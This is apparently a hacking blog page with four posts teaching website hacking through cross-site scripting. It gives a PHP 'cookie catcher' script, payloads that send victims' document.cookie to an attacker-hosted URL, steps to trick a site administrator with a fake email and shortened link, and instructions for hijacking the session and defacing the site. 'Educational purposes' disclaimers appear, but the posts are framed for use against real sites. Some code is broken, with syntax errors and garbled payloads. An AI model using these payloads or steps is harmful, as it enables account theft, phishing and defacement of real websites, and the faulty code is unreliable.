Splitting the Cookie Catcher Code Line by Line for Understanding

Tweet

Hello guys , hope you all are fine and enjoying good health. Yesterday I posted about What is Cookie Catcher and How to Get Cookies Using it. It was a simple topic and there's nothing difficult to understand in it and we all know this is used in XSS Attack for the purpose of Website Hacking .Today in this post I am going to split up the code of cookie catcher line by line to make you understand what actually this code is doing.This tutorial is just for understanding the cookie catcher code to develop programming approach in you but if you don't want to go in depth of code then simply skip this topic.

Complete Cookie Catcher Code

• This is the same code as I have posted in previous tutorial.

<?php
$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);;
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Website: '.$referer.'<br><br><br>');
fclose($fp);
header ("javascript:history.back()");
?>

Splitting the Cookie Catcher Code

Now I am going to split the cookie catcher code line by line and giving the description of what this line of code is doing in actual.

<?php
Write the Code Here
?>

• These two code lines tell the server that the code written inside them is php code.
• First line is the starting line of code and and the second tells about its end and the code comes within these lines.

$cookie = $_GET['cookie'];

• This line is the backbone of the Cookie Catcher Code,it gets the cookie from the web browser using php's GET statement

$ip = $_SERVER['REMOTE_ADDR'];

• REMOTE_ADDR is the user's IP and due to this command we are able to get the ip address of user as well.

$date=date(“j F, Y, g:i a”);

• Date is well the date the cookie was taken and all the alphabets are actually the variables where the captured date is stored.

$referer=$_SERVER['HTTP_REFERER'];

• HTTP_REFERER is the site from where the user clicked your script and his cookie are captured.Its actually the same site where you have posted your script.

$fp = fopen('cookies.html' 'a');

•  This code opens a file named cookies.html on the server where you have uploaded the cookie catcher tool and its the same file where your cookie catcher code will actually come.

fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Website: ‘.$referer.’<br><br><br>’);

• In the previous code ,we opened a file named cookies.html, now we have to write the captured cookies in it so this code actually do this thing.
• It writes the Cookie ,Date and Time and Website in the opened file cookies.html .

fclose($fp);

• After writing all the data in cookies.html ,this code finally close the file.

header ("javascript:history.back()");

• This final line of code sends the user back to the last page fro where he clicked on your link.
• This code is very useful as victim has no idea that his cookies are captured.

That's all for today and if you want to check where and how to use this Cookie Catcher then read Hack Website Using XSS Attack .

NOTE : You may write your own cookie catcher code if you have the basic knowledge of php and again i am mentioning that this tutorial is totally for educational purposes and team of HWS is not responsible for any kind of misuse of this code.

Read More

What is Cookie Catcher and How to Get Cookies Using it

Tweet

Hello guys , hope you all are enjoying good health. the day before yesterday I have completed my tutorial on XSS in which we checked Hack Websites using XSS Attack and then Hack Website using XSS Attack - Non Persistent  Method In those tutorials I have told that we have to use cookie catcher tool to get the cookies in our online free php hosting account . After that I got a lot of questions about Cookie Catcher like what is it etc.
So today I am going to discuss what this cookie catcher tool is and some basic concepts related to it.Hope yous guys like and If you have any problem in it do let me know in comments.

What is Cookie ?

• First of all we will see what is cookie.In simple words a cookie is a special thing which our web browser used to store our information such as user username , passwords, etc.
• Like have you guys ever noticed when we log in to some account like Facebook and click on any page to open it in new tab then why don't we have to log in our username and password again.Even if we close our Facebook account and again open it still there is no need to log in your details again unless you log out your account.
• This thing is done by cookie of our browser.It actually for our ease but think what happens if this cookie got steal,then someone can easily log in our account without even knowing the password.

What is a cookie catcher?

• A cookie catcher tool is nothing but just a php script which captures our browser's cookies.
• Hacker usually sends you a code or link and this link is connected to the cookie catcher.
• When someone clicks on that link,the cookie catcher works and captures all the cookies of the innocent victim and sends them to hacker.

Is making a cookie catcher hard ?

• Now the question arises,is it difficult to make a cookie catcher as it looks like we have to do some php programming etc.
• The answer is no , if you you basic knowledge of php,you can make cookie catcher very easily. 
• In fact the hard part is to get someone to click on a link which contains your cookie catcher.

How to Make a Cookie Catcher ?

• Copy the below code in a notepad :
  

<?php
$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Website: '.$referer.'<br><br><br>');
fclose($fp);
header ("javascript:history.back()");
?>

• Save this notepad as CookieCatcher.php
• Hurrah !!! You have created a cookie catcher.

 How to Use Cookie Catcher ?

• Now the question arises how can we use a cookie catcher.
• First of all create a free account on 0fees.net
• After creating account open cpanel.0fees.net and log in to your account.
• Now under File Management , click on Online File Manager .
• Now open htdocs and upload the CookieCatcher.php file in it.
• Now upload the below code in any site which is vulnerable to XSS like make a post in some forum.

<a onclick="document.location='http://YOUR-USER-NAME.0fees.net/cookiecatcher.php?cookie='+escape(document.cookie);" href="#"> click here </a>

• Make sure to change user username .
• After posting this will appear like a link and when someone clicks on that link , the cookie catcher automatically creates a file named Cookies.html in the same folder in your account and the cookies of that clicker will come to that file.

NOTE : This tutorial is only for Educational purposes and HWS team is not responsible for any kind of mis use of it .

Read More

Hack Websites using XSS Attack - Non Presistent Method

Tweet

Hello guys, hope you are fine.Well yesterday we have discussed Hack Website using XSS Attack in which we learn the first type of XSS i.e. Persistent XSS .Today we will discuss it a little further in which we will cover second type of Xss and how to hijack session after XSS.One more thing guys, don't ask me to personally teach you this stuff as I don't have much time and its really hectic but if you have any problem clear it in comments and I will completely satisfy you while answering your problem . So , I think now we should start so let's start :

Non-Persistent XSS:

In this method we will force our victim to go to our link,initial steps are almost similar to previous method.

• First of all we will search for a XSS vulnerable site.
• After finding the site check for its search box , it must be like this search.php and now you have to check whether this search.php is vulnerable or not.
• To check this add this simple code in the search box and click the search button.
  

Code:

<script>alert(document.cookie)</script>

• After searching this code if a box popup it means this search.php is vulnerable to Non-Persistent XSS attack.
• Now after confirming the vulnerability add the below code in the url of this search.php page.

Code:

"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>

• Now we have to shrink the link of whole page for this use tinyurl or any other such service.
• Now try to find a site administrator's E-mail,for this you may use whois lookup table or any online service which gives you the detail of the site's owner
• After getting the email id send him a fake email from any online fake mailer or through your fake id.
• In the body of the email just tell something fake like: Hey i found a huge bug in your website! and give him the shrinked link of the search.php in which you have also added the code.
• Tinyurl will mask the link and don't let it to go to spam
• Once he clicked on that link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookies catcher. 
• No matter what he does and changes his password you can still login as him.

NOTE : Among these two types of XSS , Persistent is used most commonly and is the best way to get cookies.

Session Hijack

Until now we have discussed that how to get cookies of someone using XSS and now we will check how to use these cookies to enter into the victim's account .This is called Session Hijack.

• Ok now we have got the admin's cookies using both methods, so we need to edit our own browser's cookies. 
• First of all go to that site's admin login or its main page whose cookies you have.
• Now delete ALL of your cookies from that page.For this check the topic on cookies. 
• Now go in your cookies.html page which you have made on a free hosting site and copy everything in front of the Cookie: in a notepad.These are the cookies. 
• This sign ; separates cookies from each other so first copy the code before the ;i.e the first cookie.
• Now come back to that vulnerable site and instead of  link add the following code but don't hit enter:

Code:
Javascript:void(document.cookie="ADD YOUR COOKIE HERE")

• Add that cookie in between " " and now hit enter.
• Do this with all of the cookies and refresh the page.
• And hurrah!!! you are logged in as administrator.
• So now go in your admin panel and upload your deface page,now you can do anything to that site.

That's all for today,hope you guys like it , I will try to make a video tutorial on it . If you guys have any problem ask in the comments. Have fun .... Take care ..... :))

Read More

Hack Websites using XSS Attack

Tweet

I have already posted about How to Hack Website Completely using SQL Injection and I have also  posted a Video Tutorial on it.Today I am going to start on XSS.I know most of the guys don't know even about its name so I am gonna start it from very basics to give you the whole concept of it .Hope you guys like it .

Introduction of XSS

• XSS attack is used to hack websites online and it mostly works on those sites which use cookies for storing your username and password when you log in that site.Check this Wikipedia article for knowing what are cookies.
• XSS usually works on those sites which allows users to add any code in an open place like starting new thread in forums or can send codes using messages to other members.It is actually a script / a code which attacker submit and whoever clicks or even see it got affected .
• The purpose of the attacker or hacker doing XSS is to steal the cookie of a user, which is currently log in on that site and viewing that code submitted by the hacker, so that he can later use that cookie to get into his account . (Steal in this context means just get a copy of cookie, rather than removing the original cookie).

For Example : User A log in on a site and user B use XSS attack and gets the cookie of user A , now user B can easily come into the account of user A using these cookies ..... :))

Finding a XSS Vulnerable sites:

• First of all,we need to find sites which are vulnerable to XSS attack.There are many such sites.
• To find XSS vulnerable sites add a code after the link.Add below given codes after the site link to find whether the site is vulnerable or not :

Code:

"><script>alertundefineddocument.cookie)</script>

Code:

'><script>alertundefineddocument.cookie)</script>

Code:

"><script>alertundefined"Test")</script>

Code:

'><script>alertundefined"Test")</script>
Or a new one which i found out myself which you can inject HTML:

Code:

"><body bgcolor="FF0000"></body>

Code:

"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe>

• After adding these codes after the link if your site is http://www.example.com the link to test it would be: http://www.example.com/index.php?id="><script>alert(document.cookie)</script> and now press Enter.
• Then if we see a javascript is pop up Or you saw the page's background go black Or a page of google opens in that site,it means we have come to a XSS vulnerable site.

Types of XSS Attack

• There are two types of mostly used XSS attacks named :

1. Persistent XSS
2. Non-Persistent XSS

Persistent XSS:

• This is the first type of XSS.In this method we will steal the victim's cookies with no suspect on us.
• So,let us assume that we have found a XSS vulnerable forum which has HTML enabled or a site which has a comment page which is vulnerable to XSS attack.
• So now lets try to grab it's cookies.
• First of all download a cookie catcher tool online by searching on google and upload it on any free hosting site which supports php .
• Now come to that vulnerable site and if there is a box to type and submit then add the following code in it:

Code:<script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>

• Replace the bold link with the link of your cookie catcher uploaded on free hosting site.
• Now submit that post in the forum or the comment box and I would suggest to add some text before or after it so that it wont look like a spam.
•  Refresh the page, now go to the newly created page, in the same directory as you saved your cookie catcher .php 
• Search for cookies.html which is a new file that show you the cookies. like if your cookie catcher link would be: http://www.example.com/cookie catcher.php the container of the cookies would be: http://www.example.com/cookies.html
• Now save these cookies as we gonna use them to hijack session of victim.... ;)

That's all for today ,I will post more on it tomorrow in which we will check Non-persistent XSS and also check how to use these cookies to hijack the session of victim .If you have any question till now may ask in comments..... Take care ... :))

---

Update : I have posted the the second part of this tutorial named Hack Website using XSS Attack - Non Persistent  Method.

Read More